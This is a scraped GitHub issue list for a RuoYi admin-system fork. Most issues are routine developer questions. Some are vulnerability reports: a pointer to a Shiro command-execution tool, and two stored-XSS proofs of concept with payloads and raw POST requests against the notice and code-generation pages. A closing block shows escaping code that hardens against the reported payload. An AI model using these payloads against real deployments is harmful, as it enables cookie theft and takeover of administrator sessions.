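lerry903 / ruoyi
A permission management system based on Spring Boot 2.1; easy to read and understand, with a clean and attractive interface. The core stack is Spring, MyBatis, and Shiro, with no other heavyweight dependencies. Runs out of the box.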
Home Page: http://www.ruoyi.vip
License: Apache License 2.0
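The initial value of isAsc in the sorting utility class is not set successfully
Where is the front-end project? I didn't see it in the documentation.
Currently, once @Excel is added to remark, the column name ends up in the first column of the Excel file. Any guidance from the experts would be appreciated.
Does the author's back-end service support cross-origin access?
Clicking second-level menu items does nothing. I've been at this all night, please help!!!
I wrote a shared shop header in the project. It does not use anything from the admin back office, and the back office does not reference anything of mine.
None of that is the point. The point is that I wrote an API following the code conventions,
import { getShopUserInfo, getAllCount } from '@/api/shopCommon'
After importing it like this, the code runs without errors and can fetch data from the back end.
But this line of code affects the back office's second-level menu: clicks no longer work.
The first-level menu still works; clicking it shows content.
I am completely baffled. I went through the routing from start to finish and still could not figure it out.
The detailed code is below, slightly trimmed to make it easier to check.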
import { userInfo, allCount } from '@/api/shop/common'
export default {
  name: 'GlobalHeader',
  methods: {
    async getUserInfo () {
      await userInfo().then(res => {
        const location = res.data.loginIp
        const name = res.data.userName
        const depart = res.data.deptName
        this.location = location
        this.name = name
        this.depart = depart
      })
    },
    async refreshAllCount () {
      await allCount().then(res=>{
        const myselectCount = res.data.myselectCount
        const myRecomCount = res.data.myRecomCount
        const myOrderFormCount = res.data.myOrderFormCount
        const mySubscribeCount = res.data.mySubscribeCount
        this.myselectCount = myselectCount
        this.myRecomCount = myRecomCount
        this.myOrderFormCount = myOrderFormCount
        this.mySubscribeCount = mySubscribeCount
      })
    }
  }
}

import GlobalHeader from './GlobalHeader'
export default GlobalHeader

import { shopAxios } from '@/utils/request'
const api = {
  userInfo:"/shop/index/loginUserInfo",
  allCount:'/shop/index/allCount'
}
export function userInfo(){
  return shopAxios({
    url:api.userInfo,
    method:'get'
  })
}
export function allCount(){
  return shopAxios({
    url:api.allCount,
    method:'get'
  })
}
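Repository address: pending...
Our development and test environments share the same database, but the scheduled tasks in the development environment sometimes run together with those in the test environment, which causes problems. After searching on Baidu, I put scheduling.enabled=false in the configuration file, but it had no effect. Is there a good way to solve the problem of scheduled tasks running together across multiple environments?
eu.bitwalker.UserAgentUtils
I suggest removing untrusted third-party jars; jar packages that have not been proven in practice always cause all kinds of problems.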
ry-ui.js?v=4.0.0:1027 Uncaught TypeError: Cannot read property 'contentWindow' of undefined
at Object.successTabCallback (ry-ui.js?v=4.0.0:1027)
at Object.success (ry-ui.js?v=4.0.0:968)
at j (jquery.min.js:2)
at Object.fireWith [as resolveWith] (jquery.min.js:2)
at x (jquery.min.js:4)
at XMLHttpRequest. (jquery.min.js:4)
The cause of the vulnerability
The project uses Shiro version 1.7.0; this version should not have this vulnerability;
Code layer troubleshooting:
Exploit:
You can use the following tools to exploit this vulnerability, Github project: https://github.com/j1anFen/shiro_attack
Execute system commands
A second-level route page has a "view details" click that opens a third-level route page. How do I add that route so that it does not appear in the side navigation bar, while the breadcrumb still records the parent route?
function queryUserList() {
    var options = {
        url: prefix + "/list",
        createUrl: prefix + "/add",
        updateUrl: prefix + "/edit/{id}",
        removeUrl: prefix + "/remove",
        exportUrl: prefix + "/export",
        modalName: "监控-字典对应",
        showExport: false,
        pagination: false,
        sortName: 'srot',
        sortOrder: 'asc',
        striped: true,
        showRefresh: false,
        uniqueId:"id",
        //onDblClickCell: onDblClickCell,
        onDblClickCell: onDblClickCell,
        columns: [{
            checkbox: false
        },
        {
            field : 'id',
            title : '',
            visible: false
        },
        {
            field : 'xmmc',
            title : '项目名称',
            sortable: true
        },
        {
            field : 'xmbm',
            title : '项目编码',
            sortable: true
        },
        {
            field : 'zdmc',
            title : '字段名称',
            sortable: true
        },
        {
            field : 'zdbm',
            title : '字典编码',
            sortable: true
        },
        {
            field : 'dyzdmc',
            title : '对应字段名称',
            sortable: true
        },
        {
            field : 'dyzdbm',
            title : '对应字段编码',
            sortable: true
        },
        {
            title: '操作',
            align: 'center',
            formatter: function(value, row, index) {
                var actions = [];
                // actions.push('<a class="btn btn-success btn-xs ' + editFlag + '" href="javascript:void(0)" onclick="$.operate.edit(\'' + row.id + '\')"><i class="fa fa-edit"></i>编辑</a> ');
                // actions.push('<a class="btn btn-danger btn-xs ' + removeFlag + '" href="javascript:void(0)" onclick="$.operate.remove(\'' + row.id + '\')"><i class="fa fa-remove"></i>删除</a>');
                var aStr1 = "<a onclick='syncClick(" + index + "," + row.id +")'><i class=\"fa fa-edit\"></i>同步</a> ";
                var aStr = "<a onclick='addDy(" + index + "," + row.id +")'>新增对应关系</a> ";
                var aStr2="";
                if(row.sfxzdygx!='1'){
                    var aStr2 = "<a onclick='del(" + index + "," + row.id +")' shiro:hasPermission=\"system:tEhrJkZddy:remove\">删除</a>"
                }
                //actions.push('<a onclick="addDy(\'' + tEhrJkMain, '\' + \'' + row.id + '\')">新增对应关系</a>')
                actions.push(aStr1);
                actions.push(aStr);
                actions.push(aStr2);
                return actions.join('');
            }
        }
        ]
    };
    $.table.init(options);
}
function onDblClickCell(field, value, row, $element){
    $.operate.edit(row.id);
}
/**
 * @param {field name of the clicked column} field
 * @param {value of the clicked column} value
 * @param {data of the whole clicked row} row
 * @param {td element} $element
 */
function onDblClickCell(field, value, row, $element) {
    if(field == 'dyzdmc' || field == 'dyzdbm') {
        $element.attr('contenteditable', true);
        $element.blur(function () {
            var index = $element.parent().data('index');
            var tdValue = $element.html();
            saveData(index, field, tdValue, row);
        })
    }else{
        $.modal.alertError('只能修改对应字段名称和对应字段编码');
    }
}
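When using multiple threads, the following error occasionally occurs:
org.apache.shiro.session.UnknownSessionException: There is no session with id [800e3201-637e-4c7b-988a-b73dc7b13d4b]
The user's other features work normally; the error occurs only with multithreading.
Does the ShiroConfig class set the cookie name for the Shiro session?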
After the administrator logged in, open the following page
system management->Notice notice
Then add the following XSS statement to the announcement title
poc: ”><sCript>alert
xss</SCript>
Here is the POST request:
POST /system/notice/edit HTTP/1.1
Host: localhost
Content-Length: 219
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/system/notice/edit/10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
After the administrator logged in, open the following page
System tools->code generation
Then click Import, select any one and click OK. Then click Edit, click basic information, and enter the following XSS statement in the column of table name
poc2:')" onmousemove=alert(document.cookie) a=(1
Here is the POST request:
POST /tool/gen/edit HTTP/1.1
Host: localhost
Content-Length: 3880
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/tool/gen/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
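The table-name value in the second report has the shape of an input that closes a JavaScript string and the surrounding quoted HTML attribute. As an added example (not RuoYi's code; `editTable`, the `js-edit-table` class and the link markup are hypothetical, and the vulnerable template itself is not shown on this page), the following contrasts an inline handler built by string concatenation with an escaped data attribute, using the reported value as input:

```javascript
// Added example; function names and markup are hypothetical, not RuoYi's code.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;' };

// Escape a value for HTML text or a double-quoted attribute value.
function escapeHtml(value) {
  return String(value == null ? '' : value).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Weak pattern: the value is concatenated into a JS string inside an attribute.
function unsafeEditLink(tableName) {
  return '<a href="#" onclick="editTable(\'' + tableName + '\')">' + tableName + '</a>';
}

// Hardened: no inline handler; the value travels in an escaped data attribute.
function safeEditLink(tableName) {
  const v = escapeHtml(tableName);
  return '<a href="#" class="js-edit-table" data-table-name="' + v + '">' + v + '</a>';
}

// One delegated listener reads the value back as data, never as code (browser only).
function bindEditHandlers(root, onEdit) {
  root.addEventListener('click', (event) => {
    const link = event.target.closest('a.js-edit-table');
    if (link) { event.preventDefault(); onEdit(link.dataset.tableName); }
  });
}

// Attribute names an HTML tokenizer would see on the opening <a> tag.
function attributeNames(html) {
  const names = [];
  const attr = /\s*([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/y;
  attr.lastIndex = html.indexOf('<a') + 2;
  let m;
  while ((m = attr.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Table-name value quoted in the report above.
const REPORTED_TABLE_NAME = "')\" onmousemove=alert(document.cookie) a=(1";

// Compare the attributes each rendering produces for the reported value.
function demo() {
  return {
    unsafe: attributeNames(unsafeEditLink(REPORTED_TABLE_NAME)),
    safe: attributeNames(safeEditLink(REPORTED_TABLE_NAME)),
  };
}

console.log(demo());
```

The same escaping applies to the notice title in the first report wherever it is rendered as HTML; server-side output encoding in the template remains the primary fix.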